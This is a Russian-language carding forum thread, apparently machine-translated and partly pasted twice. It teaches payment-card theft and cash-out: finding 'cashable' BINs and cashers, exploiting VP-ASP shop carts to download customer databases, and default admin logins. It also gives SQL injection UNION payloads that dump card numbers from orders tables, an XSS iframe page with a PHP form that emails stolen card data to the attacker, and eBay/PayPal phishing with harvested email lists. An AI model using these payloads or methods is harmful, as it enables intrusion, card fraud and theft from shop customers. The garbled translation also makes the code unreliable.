Оффлайн
Isildur26
Заблокирован
- Регистрация
- 15.10.17
- Сообщения
- 102
- Реакции
- 38
- Репутация
- 106
Я не являюсь автором данной статьи . Написана была на английском переведена гуглом (прошу прошения сильно не ругайте)
Что такое кредитная карта?
Кредитные карты бывают двух типов:
дебетовые карты
Кредитные карты
1. Дебет означает , что вы имеете сумму количества в нем , и вы можете использовать их.
2. Кредитные средства у вас есть лимит кредитной линии , как в $ 10000 , и вы можете использовать их и в конце месяца оплатить его в банке.
Чтобы использовать кредитную карту в Интернете у просто не нужен номер куб.см и срок , но и нужно много информации , как:
Имя
Фамилия
Адрес
Город
Государство
Индекс
Страна
Телефон
CC номер
экспирации
CVV2 (это 3 - значное защитный код на обратной стороне после панели подписи)
Если вы получаете эту информацию вы можете использовать, чтобы купить любую вещь в Интернете, как и лицензии на программное обеспечение, порно членством сайт, прокси - сервер членства, или любой вещи (онлайн - услуг обычно, как веб - хостинг, домены).
Если и хотите , чтобы заработать деньги $ через взлом , то вам нужно быть очень повезло ... Вы должны иметь точный банк и бен нажиться , что кредитные карты через банкоматы.
Позвольте мне объяснить , как?
Сначала рассмотрим некоторые простые термины.
БИНС = первая цифра 6 каждой кредитной карты называется «БИН» (например , номер куб.см является: 4121638430101157 , то его бункер «412163»), я надеюсь , что это легко понять.
Теперь вопрос заключается в том , как заработать деньги с помощью кредитных карт. Его странно ..., ну вы не можете сделать это, но есть определенные люди в мире , которые могут сделать это. Они называют их самих «кассиры». Вы можете занять некоторое время , чтобы найти надежные кассир.
Теперь вопрос каждый банк кредитных карты обналичиваемые и каждый бин является реализуемым? Как Ситибанк, Банк Америки, Мбно .. являются все банки cashables? Ну ответ «НЕТ». Если и знать некоторые вещи, немного вещь о банковской системе, которые у когда - нибудь слышали , что банкоматы? Где у отзывать уры наличных денег, поставив уры карты.
Каждый банк не имеет банкоматов, каждый банк не поддерживают банкоматы Выплаты. Лишь немногие банки поддерживают их несколько бункеров (как и знают бен являются первыми 6 цифр любого номера кредитных / дебетовой карты), для банка допускает америку. Этот банк не только один бункер, что банк назначается как, 412345 412370 являются ур Бункеры и может сделать кредитные карты на них. Так банк делит расположение страны CITI мудры, как от 412345 - 412360 для американцев, после того, что для посторонних, и как это. Я надеюсь, что у понять. Таким образом, все контейнеры одного и того же банка даже не реализуемый, как для предположим, что они поддерживают ATM в Нью-Йорке, а не в Калифорнии, так как закромах Калифорнии того же банка будет uncashable. Поэтому убедитесь, что контейнеры и банки 100% реализуемые на рынке многих кассиров.
Будьте уверены , кассиры законны, потому что многие кассиры г там , которые принимают вашу кредитную карточку и отрываться U от и не отправить 50% акций обратно.
Вы также можете найти некоторые кассир на Mirc * (сервер irc.unixirc.net:6667 /) канал: #cashout, #ccpower
Ну, проверьте веб - сайт , где и есть список бункеров и банков в основном 101% обналичиваемых. Если и получить кредитную карту того же банка с тем же ведро, то и может вывести деньги не иначе. Помните , для использования кредитной карты в Интернете у не нужен PIN - код (4 слова пароля , который у входа в банкомате), но и для вывода средств и нужно. Вы можете получить контакты только от 2 - го методы взлома , который я до сих пор не пост , но я буду. Первый метод SQL - инъекция и shopadmin хакерства не обеспечивает булавки, он только дать CC онемела CVV2 и другую информацию , которая , как правило , необходимую для покупки не для обналичивания.
Кредитная карта Взлом
CC (кредитные карты) может быть взломана два способами:
Мошенничество кредитной карты ( как правило , используется для зарабатывания денег, несколько раз для покупок)
Credit Card Shopadmin Hacking (просто для удовольствия, знаний, магазины в интернете)
1. Shopadmin Hacking
This метод используется для проверки знаний или для получения кредитной карты для покупок в Интернете, или для удовольствия, или каким - либо образом , но не для обналичивания (потому что этот метод не дает PIN - 4 - значный код доступа) только дает куб.см онемели, CVV2 и другие основные сведения.
Shopadmins бывают разных компаний, как: VP-ASP, X CART и т.д. Это руководство предназначено для взлома VP-ASP SHOP.
Я надеюсь , что у видело , когда у попытаться купить некоторые вещи в Интернете с куб.см, они показывают иа хорошо запрограммированная форму, очень безопасно. Они повозки, как оп-асп xcarts. Конкретные сайты не взломаны, но тележки взломаны.
Ниже я отправляю учебник взломать VP ASP корзину. Теперь каждый сайт , который использует эту тележку можно взломать, и через файл * MDB и могут получить «данные кредитную карту» своих клиентов, а также регистрационное имя и пароль своей админки, и все другие данные клиентов и Comapny секретов.
Начнём:
Тип: VP-ASP Корзина
Версия: 5.00
Как найти VP-ASP 5.00 сайтов?
Поиск VP-ASP 5.00 сайтов так просто ...
1. Перейти к google.com и типа: VP-ASP Корзина 5,00
2. Вы найдете множество сайтов с VP-ASP +5,00 корзину программного обеспечения , установленные
Теперь давайте перейдем к подвигу ..
страница будет выглядеть следующим образом : ****: //***.victim.com/shop/shopdisplaycategories.asp
Подвиг есть: diag_dbtest.asp
Теперь вам нужно сделать , это: * ***: //***.victim.com/shop/diag_dbtest.asp
появится страница содержит те:
xDatabase
shopping140
xDblocation
Resx
xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe г
Пример:
самое главное здесь xDatabase
xDatabase: shopping140
Хорошо, теперь URL будет выглядеть следующим образом : ****: //***.victim.com/shop/shopping140.mdb
Если вы не загрузили базу данных, попробуйте это в то время как есть dblocation:
xDblocation
Resx
URL - адрес будет: ****: //***.victim.com/shop/resx/shopping140.mdb
Если и появляется сообщение об ошибке , вы должны попробовать это:
****: // ***. victim.com/shop/shopping500.mdb
Скачать файл MDB , и вы должны быть в состоянии открыть его с помощью любого MDB файла просмотра, вы должны быть в состоянии найти один в download.com, или использовать MS Office Access.
Внутри вы должны быть в состоянии найти информацию о кредитной карте, и вы должны даже быть в состоянии найти имя пользователя и пароль администратора для сайта.
Страница администратора Логин обычно находится здесь: ****: //***.victim.com/shop/shopadmin.asp
Если вы не можете найти имя пользователя и пароль администратора в файле MDB или вы можете , но это неверно, или вы не можете найти файл MDB на всех, а затем попытаться найти страницу администратора для входа и введите пароль по умолчанию , которые являются:
Имя пользователя: администратор
Пароль: администратор
или
имя пользователя: vpasp
пароль: vpasp
2. Взлом через Мошенничество
Этот метод обычно используется для взлома для зарабатывания денег. Что происходит в этом методе вы создаете страницу клона.
Цель: его в основном eBay.com или paypal.com для общих кредитных карт, или , если и хочет , чтобы какой - либо конкретный целевые обналичиваемый банк как regionbank.com то и есть , чтобы создать страницу клона для этого банка.
Что такое eBay.com?
Его торговый сайт во всем мире , который используется многими из миллиардов людей , которые используют свои кредитные карты на Ebay. Что вы делаете подобную страницу такой же , как eBay и загрузить его на какой - то хостинг , которые не имеют каких - либо ограничений права, попытаться найти хостинг в Европе они сделают вашу аферу на долгое время, и по электронной почте пользователям eBay.
Как получить электронную почту своих пользователей?
Перейти к google.com и типа «E - mail Harvestor» или любой Email Spider и поиск eBay покупателей и продавцов eBay и и получите длинный список. Этот список не является точным , но из 1000 по крайней мере 1 электронной почты будет действительными. По крайней мере , вы получите некоторое время.
Ну у создать клон страницу Ebay, и отправить список у создать из паука с сообщением, как «Ваш аккаунт был взломан» или какой - либо причине , что выглядит профессионально, и попросить их посетить по ссылке ниже и введите платежную информацию, и страница аферы есть программирование , когда они входят в свою информацию он приходит непосредственно к вашей электронной почте.
На странице формы и есть PIN - код требуется поэтому у также получить номер PIN - кода , через который и можно обналичить через банкомат ..
Теперь , если и запустить eBay афера или Paypal афера, его до вашей удачи , кто ваша жертва. Клиент банка америки или Ситибанк или регион, его удачи, может получить у обналичиваемого, может быть у никогда не его просто везения, ничего другого.
Поиск по Google для загрузки аферы сайта и изучить его!
После создания жульничества сайта, просто найти адрес электронной harvestor или паука из Интернета (скачать хороший на Bulk Email Software Superstore - Email маркетинг Интернет - реклама) и создать хороший список адресов электронной почты.
И вам нужно найти почтовую программу (массовой отправку почтовой программы) , которые массовую рассылку электронной почты - на все письма с сообщением обновления своей учетной записи на странице Уры жульничества). В от, использовать электронную почту [email protected] и в теме использовании: eBay - пополняйте счет eBay и во Имени использовать eBay
Некоторые инструкции:
1. Убедитесь , что ваш хостинг остается до или ссылки в сообщении электронной почты и будет посылать, и когда ваши письма жертвы посетить его, он будет отображаться страница не может быть отображена, и ваш план будет провален.
2. Сильнее пункт найти хостинг , который остается в афере. даже я не легко найти его, его очень и очень трудное.
3. Может быть , и есть контакты с кем - то , кто владеет хостингом местоположения компании и совместной или посвященным он может скрыть аферу в некоторых из выделенных без ограничений.
4. Найти хороший список адресов электронной почты (хорошие средства = фактически пользователи)
5. Ваш массовой рассылки программного обеспечения земли электронных писем в почтовом ящике пользователей.
=================
отчет
njfliiboy
Незарегистрированный
Escrow Баланс:
[ЧАСТЬ 2]
Это мой метод для получения свежей информации CC, отправленную непосредственно в почтовый ящик по вашему выбору!
Во- первых, вам нужно найти себе уязвимый магазин. Не буду вдаваться в слишком много деталей здесь, это должно быть довольно пробурено в голова сейчас. Вы можете сделать это с помощью Google Dorks вручную, или использовать такие инструменты , как WebCruiser, SQLI яд и т.д. , что ищете магазин с обеих SQLI уязвимости и XSS уязвимостей.
Во- первых, как вы могли заметить , в большинстве баз данных , содержащих информацию CC, он зашифрован, MD5, FPE, чем бы он это не представляется возможным , чтобы работать с этим. Тем не менее, одна вещи , которую вы можете работать с этим адресом электронной почты текущего и бывшего клиента. Идите вперед и копировать всю таблицу с информацией о клиенте. Если вам повезет, вы получите по крайней мере , 10000 адреса электронной почты или больше.
Далее, вы должны работать с уязвимостью XSS. Я заметил , наиболее распространенные уязвимости существо POST, так что я буду идти по этому пути, но вы можете включить его с ФОРМЕ или любой другой .
Вы можете использовать следующий код , чтобы сделать redirect.html или что вы хотите назвать это. Эта страница будет загружаться уязвимым сайт сразу, за одним исключением, гигантским IFRAME над ним , который, конечно , собирается другая страница вы делаете.
PHP код:
<HTML>
<HEAD>
<язык сценариев = Javascript>
функция submitPostLink ()
: зин: {
document.postlink.submit ();
}
</ SCRIPT>
</ HEAD>
<BODY OnLoad = "submitPostLink ()">
<форма действия = "HTTP: //
<тип входного = "скрытые" NAME = "NAMEOFVULNERABLEFIELD" значение = "<IFRAME SRC = & Quot; электронной коммерции хостинга веб - сайтов и потокового от YourHost.com ширина = & Quot; 800 & Quot; высота = & Quot; 2400 & Quot; стиль = & Quot; Z-индекс : 0; позицию: абсолютная; сверху: 0; слева: 0; переполнение-у: скрытый; & Quot; frameborder = 0 ALIGN = центр> </ IFRAME> ">
</ form>
</ тело>
</ HTML>
вперед и Гота страница оформления заказа на сайт вы работаете, и сохранить страницу на жесткий диск, включая все поддиректории и файлы изображения (светлячок делает этот автомобиль). Теперь вам нужно отредактировать главный файл , который вы только что сохранили.
Поиск «действия =», и изменить страницы , следуя его на третью страницу вы будете делать, которая будет PHP почты формы , которая будет посылать ваш адрес электронной почты всей информации кто - то заполняет форму. Код будет выглядеть примерно так ....
PHP код:
<PHP?
$ UserInfo = "@com"; // ваш адрес электронной почты здесь
$ ф = GETENV ( "REMOTE_ADDR");
$ сообщение = "\ п "" $ _ POST [ 'Firstname']..";
$ сообщение = "\ п "" $ _ POST [ 'фамилия']..";
$ сообщение = "\ п "" $ _ POST [ 'ORG_NAME']..";
$ сообщение = "\ п "" $ _ POST [ 'телефон']..";
$ сообщение = "\ п "" $ _ POST [ 'факс']..";
$ сообщение. = "". $ _ POST [ 'электронная почта'].»
$ сообщение = "\ п "" $ _ POST [ 'credcard']..";
$ сообщение = "\ п "" $ _ POST [ 'exp_mon']..";
$ сообщение = "\ п "" $ _ POST [ 'exp_year']..";
$ сообщение = "\ п "" $ _ POST [ 'cccvv']..";
$ сообщение = "\ п "" $ _ POST [ 'ccname']..";
$ Subject = "ОБЪЕКТ - $ ф";
$ Заголовки = "От: NAMEl <. @ ком>";
$ Заголовки = $ _POST [ 'eMailAdd'] "\ п"..;
$ Заголовки = "MIME-Version: 1.0 \ п".
почта ($ UserInfo, $ при условии, $ сообщение, $ заголовки);
Вы хотите , чтобы следовать этому коду с некоторым HTML кодом , который также похож на копию своего сайта , но с каким - то текстом говорил что - то вдоль линий «извините,
После сдачи все это вместе , и загрузить его на хост, вы хотите , чтобы сократить Youre redirect.html URL, вы можете использовать ******* или другую услугу укорочение. Затем, вы можете отправить по электронной почте всем клиентам адреса электронной почты (и вы можете быть CREATIVE), но что - то вдоль линий их быть ценным клиентом, и из - за того, что вы даете им одну из ваши новые продукты для всего 99 центов! Убедитесь , что в вашей форме оформления заказа, вы перечисляете деталь вы выбираете, чтобы они увидели, когда они проверить.
Отличный сервис для отправки массовых рассылок бесплатно и без суда или что - нибудь, то есть , если вы не взломали SMTP для использования, является targethero.com
Они позволяют отправлять Неограниченные электронные письма до 5000 различных контактов. Не плохо бесплатно. Вы должны подтвердить свой аккаунт с помощью мобильного телефона, но вы должны просто использовать receive-sms-online.com или freesmsreceive.com/index.php , где вы можете получить SMS отправлен вам без регистрации.
Поверьте мне, если вы пришлете достаточно электронной почты для бывших клиентов, особенно когда он находится в области здравоохранения и дополнения нишу, если они получают предложение на бутыль 99 центов или что - то, они собираются прыгать во всем этом!
В любом случае, если у вас есть какие - либо вопросы, пожалуйста , не стесняйтесь спросить, и я извиняюсь , если я был немного расплывчат , но у меня нет много времени , прямо сейчас , но хотели , чтобы получить это.
отчет
njfliiboy
Незарегистрированный
Escrow Баланс:
[Часть 3]
VP-ASP shopadmin уязвимость , чтобы получить доступ к списку номеров кредитных карт, адреса и другие детали клиентов вошли.
И для этого вам понадобится Microsoft Office Access.
1.Go в Google
и добавить в Search Bar Inurl:»shopadmin.asp»
Только администратор Магазин администратор
Примечание:
shopadmin.asp это имя определенной веб - страницы , мы можем взломать. Google может найти этот веб - страницу для нас с «Inurl» сроком.
«Магазин только администраторы»
Это в основном часть текста , найденной на веб - страницах , мы можем взломать. Так что, если название веб - страницы «shopadmin.asp»
и находим текст «магазин администраторов только» что страница взломать.
2. Теперь Google возвращается с нашими результатами. Выберите любой из них.
Shopadmin.asp
3. Теперь он запрашивает имя пользователя и пароль. Не беспокойтесь об этом. В адресной строке заменить «shopadmin.asp» с «shopdbtest.asp»
Он должен принять вас на страницу с некоторым infs на нем. Рядом , где он говорит , что «xDatabase» это имя базы данных.
После нахождения страницы Shopdbtest.asp Заменить
shopping.mdb
4. Загрузите файл базы данных и открыть его с доступом или другим программным обеспечением. Найти «клиентов» и вы будете иметь список
деталей заказчика.
5. Удачи!
----------------------------
VP-ASP 6,50
1. Dork:»питание от vpasp против 6,50»
2. Измените URL - адрес для
3. Администратор страницы: shopadmin.asp
MDB Viewer После загрузки Shopping.mdb скачать программу с здесь
DB Viewer.
После opining БД
и может искать детали придумают поиск и принять
отчет
njfliiboy
Незарегистрированный
Escrow Баланс:
1) мы получили поиск Google для интернет - магазинов, я использовал этот мужлан:
Inurl: customer_testimonials.php testimonial_id =
2) позволяет сказать , что мы получили этот сайт
3) мы должны проверить , если его уязвимым для SQLI, мы добавим это
( ') ,
если мы получим сообщение об ошибке означает сайт его vuln.
4) мы должны проверить номер столбца , мы стараемся с 10 первого
+ заказ + на + 10-
если мы не получите средства ошибок сайт имеет более 10 столбцов, если мы получим ошибка означает , что веб - сайт имеет менее 10 колонок
5) на этот раз мы получаем ошибку Теперь мы пытаемся от 1 до 9
+ союза + выбор + 1,2,3,4,5 , 6,7,8,9--
теперь мы обнаружили , что сайт имеет 9 столбцов
6) большую часть времени мы можем получить INFOS из таблицы 3 и 6, позволяет сказать , что теперь мы можем с 3, теперь мы можем получить пользователя базы данных, имя базы данных и версии базы данных следующим образом:
* - пользователь базы данных
* - имя базы данных
+ союз + выбор + 1,2, table_name, 4,5,6,7,8 , 9 + от + Информация rmation_schema.tables--
Теперь нам нужны столбцы: добавить это URL:
+ союз + выбор + 1,2, CONCAT (table_name, символ (58), Колум n_name), 4,5,6,7,8,9 + от + information_schema.column S--
отчет
njfliiboy
Незарегистрированный
Escrow Баланс:
7) Теперь все , что мы должны сделать , это посмотреть заказы и клиент Infos (есть кредитные карты): если мы добавим это к URL - адрес , мы получим номера кредитных карт, способ оплаты, тип кредитной карты .....
если добавить к этому URL мы получим много Infos о костюмеров, адрес, номер телефона, электронной почты, почтовый индекс, и Infos кредитных карт всех из них
+ союза + выбор + 1,2, CONCAT (orders_id, 0x2F, cc_type, 0x 2F, cc_owner, 0x2F, cc_number, 0x2F, cc_expires, 0x2F, у.е. stomers_street_address, 0x2F, customers_suburb, 0x2F, customers_city, 0x2F, customers_postcode, 0x2F , пользовательские ers_state, 0x2F, customers_country, 0x2F, customers_te LePhone, 0x2F, customers_email_address, 0x2F, date_pur чеканка), 4,5,6,7,8,9 + от + заказов +
/customer_testimonials.php?&testimonial_id=7+union+ выберите + 1,2, CONCAT (orders_id, 0x2F, cc_type, 0x2F, cc_o wner, 0x2F, cc_number, 0x2F, cc_expires, 0x2F, клиенты _street_address, 0x2F, customers_suburb, 0x2F, Custome rs_city , 0x2F, customers_postcode, 0x2F, customers_sta те, 0x2F, customers_country, 0x2F, customers_telephone, 0x2F, customers_email_address, 0x2F, date_purchased), 4,5,6,7,8,9 + от + заказов +
Теперь один шаг влево
8) получаем кредитные карты и получать удовольствие.
Что такое кредитная карта?
Кредитные карты бывают двух типов:
дебетовые карты
Кредитные карты
1. Дебет означает , что вы имеете сумму количества в нем , и вы можете использовать их.
2. Кредитные средства у вас есть лимит кредитной линии , как в $ 10000 , и вы можете использовать их и в конце месяца оплатить его в банке.
Чтобы использовать кредитную карту в Интернете у просто не нужен номер куб.см и срок , но и нужно много информации , как:
Имя
Фамилия
Адрес
Город
Государство
Индекс
Страна
Телефон
CC номер
экспирации
CVV2 (это 3 - значное защитный код на обратной стороне после панели подписи)
Если вы получаете эту информацию вы можете использовать, чтобы купить любую вещь в Интернете, как и лицензии на программное обеспечение, порно членством сайт, прокси - сервер членства, или любой вещи (онлайн - услуг обычно, как веб - хостинг, домены).
Если и хотите , чтобы заработать деньги $ через взлом , то вам нужно быть очень повезло ... Вы должны иметь точный банк и бен нажиться , что кредитные карты через банкоматы.
Позвольте мне объяснить , как?
Сначала рассмотрим некоторые простые термины.
БИНС = первая цифра 6 каждой кредитной карты называется «БИН» (например , номер куб.см является: 4121638430101157 , то его бункер «412163»), я надеюсь , что это легко понять.
Теперь вопрос заключается в том , как заработать деньги с помощью кредитных карт. Его странно ..., ну вы не можете сделать это, но есть определенные люди в мире , которые могут сделать это. Они называют их самих «кассиры». Вы можете занять некоторое время , чтобы найти надежные кассир.
Теперь вопрос каждый банк кредитных карты обналичиваемые и каждый бин является реализуемым? Как Ситибанк, Банк Америки, Мбно .. являются все банки cashables? Ну ответ «НЕТ». Если и знать некоторые вещи, немного вещь о банковской системе, которые у когда - нибудь слышали , что банкоматы? Где у отзывать уры наличных денег, поставив уры карты.
Каждый банк не имеет банкоматов, каждый банк не поддерживают банкоматы Выплаты. Лишь немногие банки поддерживают их несколько бункеров (как и знают бен являются первыми 6 цифр любого номера кредитных / дебетовой карты), для банка допускает америку. Этот банк не только один бункер, что банк назначается как, 412345 412370 являются ур Бункеры и может сделать кредитные карты на них. Так банк делит расположение страны CITI мудры, как от 412345 - 412360 для американцев, после того, что для посторонних, и как это. Я надеюсь, что у понять. Таким образом, все контейнеры одного и того же банка даже не реализуемый, как для предположим, что они поддерживают ATM в Нью-Йорке, а не в Калифорнии, так как закромах Калифорнии того же банка будет uncashable. Поэтому убедитесь, что контейнеры и банки 100% реализуемые на рынке многих кассиров.
Будьте уверены , кассиры законны, потому что многие кассиры г там , которые принимают вашу кредитную карточку и отрываться U от и не отправить 50% акций обратно.
Вы также можете найти некоторые кассир на Mirc * (сервер irc.unixirc.net:6667 /) канал: #cashout, #ccpower
Ну, проверьте веб - сайт , где и есть список бункеров и банков в основном 101% обналичиваемых. Если и получить кредитную карту того же банка с тем же ведро, то и может вывести деньги не иначе. Помните , для использования кредитной карты в Интернете у не нужен PIN - код (4 слова пароля , который у входа в банкомате), но и для вывода средств и нужно. Вы можете получить контакты только от 2 - го методы взлома , который я до сих пор не пост , но я буду. Первый метод SQL - инъекция и shopadmin хакерства не обеспечивает булавки, он только дать CC онемела CVV2 и другую информацию , которая , как правило , необходимую для покупки не для обналичивания.
Кредитная карта Взлом
CC (кредитные карты) может быть взломана два способами:
Мошенничество кредитной карты ( как правило , используется для зарабатывания денег, несколько раз для покупок)
Credit Card Shopadmin Hacking (просто для удовольствия, знаний, магазины в интернете)
1. Shopadmin Hacking
This метод используется для проверки знаний или для получения кредитной карты для покупок в Интернете, или для удовольствия, или каким - либо образом , но не для обналичивания (потому что этот метод не дает PIN - 4 - значный код доступа) только дает куб.см онемели, CVV2 и другие основные сведения.
Shopadmins бывают разных компаний, как: VP-ASP, X CART и т.д. Это руководство предназначено для взлома VP-ASP SHOP.
Я надеюсь , что у видело , когда у попытаться купить некоторые вещи в Интернете с куб.см, они показывают иа хорошо запрограммированная форму, очень безопасно. Они повозки, как оп-асп xcarts. Конкретные сайты не взломаны, но тележки взломаны.
Ниже я отправляю учебник взломать VP ASP корзину. Теперь каждый сайт , который использует эту тележку можно взломать, и через файл * MDB и могут получить «данные кредитную карту» своих клиентов, а также регистрационное имя и пароль своей админки, и все другие данные клиентов и Comapny секретов.
Начнём:
Тип: VP-ASP Корзина
Версия: 5.00
Как найти VP-ASP 5.00 сайтов?
Поиск VP-ASP 5.00 сайтов так просто ...
1. Перейти к google.com и типа: VP-ASP Корзина 5,00
2. Вы найдете множество сайтов с VP-ASP +5,00 корзину программного обеспечения , установленные
Теперь давайте перейдем к подвигу ..
страница будет выглядеть следующим образом : ****: //***.victim.com/shop/shopdisplaycategories.asp
Подвиг есть: diag_dbtest.asp
Теперь вам нужно сделать , это: * ***: //***.victim.com/shop/diag_dbtest.asp
появится страница содержит те:
xDatabase
shopping140
xDblocation
Resx
xdatabasetypexEmailxEmail NamexEmailSubjectxEmailSy stemxEmailTypexOrdernumbe г
Пример:
самое главное здесь xDatabase
xDatabase: shopping140
Хорошо, теперь URL будет выглядеть следующим образом : ****: //***.victim.com/shop/shopping140.mdb
Если вы не загрузили базу данных, попробуйте это в то время как есть dblocation:
xDblocation
Resx
URL - адрес будет: ****: //***.victim.com/shop/resx/shopping140.mdb
Если и появляется сообщение об ошибке , вы должны попробовать это:
****: // ***. victim.com/shop/shopping500.mdb
Скачать файл MDB , и вы должны быть в состоянии открыть его с помощью любого MDB файла просмотра, вы должны быть в состоянии найти один в download.com, или использовать MS Office Access.
Внутри вы должны быть в состоянии найти информацию о кредитной карте, и вы должны даже быть в состоянии найти имя пользователя и пароль администратора для сайта.
Страница администратора Логин обычно находится здесь: ****: //***.victim.com/shop/shopadmin.asp
Если вы не можете найти имя пользователя и пароль администратора в файле MDB или вы можете , но это неверно, или вы не можете найти файл MDB на всех, а затем попытаться найти страницу администратора для входа и введите пароль по умолчанию , которые являются:
Имя пользователя: администратор
Пароль: администратор
или
имя пользователя: vpasp
пароль: vpasp
2. Взлом через Мошенничество
Этот метод обычно используется для взлома для зарабатывания денег. Что происходит в этом методе вы создаете страницу клона.
Цель: его в основном eBay.com или paypal.com для общих кредитных карт, или , если и хочет , чтобы какой - либо конкретный целевые обналичиваемый банк как regionbank.com то и есть , чтобы создать страницу клона для этого банка.
Что такое eBay.com?
Его торговый сайт во всем мире , который используется многими из миллиардов людей , которые используют свои кредитные карты на Ebay. Что вы делаете подобную страницу такой же , как eBay и загрузить его на какой - то хостинг , которые не имеют каких - либо ограничений права, попытаться найти хостинг в Европе они сделают вашу аферу на долгое время, и по электронной почте пользователям eBay.
Как получить электронную почту своих пользователей?
Перейти к google.com и типа «E - mail Harvestor» или любой Email Spider и поиск eBay покупателей и продавцов eBay и и получите длинный список. Этот список не является точным , но из 1000 по крайней мере 1 электронной почты будет действительными. По крайней мере , вы получите некоторое время.
Ну у создать клон страницу Ebay, и отправить список у создать из паука с сообщением, как «Ваш аккаунт был взломан» или какой - либо причине , что выглядит профессионально, и попросить их посетить по ссылке ниже и введите платежную информацию, и страница аферы есть программирование , когда они входят в свою информацию он приходит непосредственно к вашей электронной почте.
На странице формы и есть PIN - код требуется поэтому у также получить номер PIN - кода , через который и можно обналичить через банкомат ..
Теперь , если и запустить eBay афера или Paypal афера, его до вашей удачи , кто ваша жертва. Клиент банка америки или Ситибанк или регион, его удачи, может получить у обналичиваемого, может быть у никогда не его просто везения, ничего другого.
Поиск по Google для загрузки аферы сайта и изучить его!
После создания жульничества сайта, просто найти адрес электронной harvestor или паука из Интернета (скачать хороший на Bulk Email Software Superstore - Email маркетинг Интернет - реклама) и создать хороший список адресов электронной почты.
И вам нужно найти почтовую программу (массовой отправку почтовой программы) , которые массовую рассылку электронной почты - на все письма с сообщением обновления своей учетной записи на странице Уры жульничества). В от, использовать электронную почту [email protected] и в теме использовании: eBay - пополняйте счет eBay и во Имени использовать eBay
Некоторые инструкции:
1. Убедитесь , что ваш хостинг остается до или ссылки в сообщении электронной почты и будет посылать, и когда ваши письма жертвы посетить его, он будет отображаться страница не может быть отображена, и ваш план будет провален.
2. Сильнее пункт найти хостинг , который остается в афере. даже я не легко найти его, его очень и очень трудное.
3. Может быть , и есть контакты с кем - то , кто владеет хостингом местоположения компании и совместной или посвященным он может скрыть аферу в некоторых из выделенных без ограничений.
4. Найти хороший список адресов электронной почты (хорошие средства = фактически пользователи)
5. Ваш массовой рассылки программного обеспечения земли электронных писем в почтовом ящике пользователей.
=================
отчет
njfliiboy
Незарегистрированный
Escrow Баланс:
You must be registered for see links
[
You must be registered for see links
]
You must be registered for see links
[ЧАСТЬ 2]
Это мой метод для получения свежей информации CC, отправленную непосредственно в почтовый ящик по вашему выбору!
Во- первых, вам нужно найти себе уязвимый магазин. Не буду вдаваться в слишком много деталей здесь, это должно быть довольно пробурено в голова сейчас. Вы можете сделать это с помощью Google Dorks вручную, или использовать такие инструменты , как WebCruiser, SQLI яд и т.д. , что ищете магазин с обеих SQLI уязвимости и XSS уязвимостей.
Во- первых, как вы могли заметить , в большинстве баз данных , содержащих информацию CC, он зашифрован, MD5, FPE, чем бы он это не представляется возможным , чтобы работать с этим. Тем не менее, одна вещи , которую вы можете работать с этим адресом электронной почты текущего и бывшего клиента. Идите вперед и копировать всю таблицу с информацией о клиенте. Если вам повезет, вы получите по крайней мере , 10000 адреса электронной почты или больше.
Далее, вы должны работать с уязвимостью XSS. Я заметил , наиболее распространенные уязвимости существо POST, так что я буду идти по этому пути, но вы можете включить его с ФОРМЕ или любой другой .
Вы можете использовать следующий код , чтобы сделать redirect.html или что вы хотите назвать это. Эта страница будет загружаться уязвимым сайт сразу, за одним исключением, гигантским IFRAME над ним , который, конечно , собирается другая страница вы делаете.
PHP код:
<HTML>
<HEAD>
<язык сценариев = Javascript>
функция submitPostLink ()
: зин: {
document.postlink.submit ();
}
</ SCRIPT>
</ HEAD>
<BODY OnLoad = "submitPostLink ()">
<форма действия = "HTTP: //
You must be registered for see links
"<тип входного = "скрытые" NAME = "NAMEOFVULNERABLEFIELD" значение = "<IFRAME SRC = & Quot; электронной коммерции хостинга веб - сайтов и потокового от YourHost.com ширина = & Quot; 800 & Quot; высота = & Quot; 2400 & Quot; стиль = & Quot; Z-индекс : 0; позицию: абсолютная; сверху: 0; слева: 0; переполнение-у: скрытый; & Quot; frameborder = 0 ALIGN = центр> </ IFRAME> ">
</ form>
</ тело>
</ HTML>
вперед и Гота страница оформления заказа на сайт вы работаете, и сохранить страницу на жесткий диск, включая все поддиректории и файлы изображения (светлячок делает этот автомобиль). Теперь вам нужно отредактировать главный файл , который вы только что сохранили.
Поиск «действия =», и изменить страницы , следуя его на третью страницу вы будете делать, которая будет PHP почты формы , которая будет посылать ваш адрес электронной почты всей информации кто - то заполняет форму. Код будет выглядеть примерно так ....
PHP код:
<PHP?
$ UserInfo = "@com"; // ваш адрес электронной почты здесь
$ ф = GETENV ( "REMOTE_ADDR");
$ сообщение = "\ п "" $ _ POST [ 'Firstname']..";
$ сообщение = "\ п "" $ _ POST [ 'фамилия']..";
$ сообщение = "\ п "" $ _ POST [ 'ORG_NAME']..";
$ сообщение = "\ п "" $ _ POST [ 'телефон']..";
$ сообщение = "\ п "" $ _ POST [ 'факс']..";
$ сообщение. = "". $ _ POST [ 'электронная почта'].»
$ сообщение = "\ п "" $ _ POST [ 'credcard']..";
$ сообщение = "\ п "" $ _ POST [ 'exp_mon']..";
$ сообщение = "\ п "" $ _ POST [ 'exp_year']..";
$ сообщение = "\ п "" $ _ POST [ 'cccvv']..";
$ сообщение = "\ п "" $ _ POST [ 'ccname']..";
$ Subject = "ОБЪЕКТ - $ ф";
$ Заголовки = "От: NAMEl <. @ ком>";
$ Заголовки = $ _POST [ 'eMailAdd'] "\ п"..;
$ Заголовки = "MIME-Version: 1.0 \ п".
почта ($ UserInfo, $ при условии, $ сообщение, $ заголовки);
Вы хотите , чтобы следовать этому коду с некоторым HTML кодом , который также похож на копию своего сайта , но с каким - то текстом говорил что - то вдоль линий «извините,
После сдачи все это вместе , и загрузить его на хост, вы хотите , чтобы сократить Youre redirect.html URL, вы можете использовать ******* или другую услугу укорочение. Затем, вы можете отправить по электронной почте всем клиентам адреса электронной почты (и вы можете быть CREATIVE), но что - то вдоль линий их быть ценным клиентом, и из - за того, что вы даете им одну из ваши новые продукты для всего 99 центов! Убедитесь , что в вашей форме оформления заказа, вы перечисляете деталь вы выбираете, чтобы они увидели, когда они проверить.
Отличный сервис для отправки массовых рассылок бесплатно и без суда или что - нибудь, то есть , если вы не взломали SMTP для использования, является targethero.com
Они позволяют отправлять Неограниченные электронные письма до 5000 различных контактов. Не плохо бесплатно. Вы должны подтвердить свой аккаунт с помощью мобильного телефона, но вы должны просто использовать receive-sms-online.com или freesmsreceive.com/index.php , где вы можете получить SMS отправлен вам без регистрации.
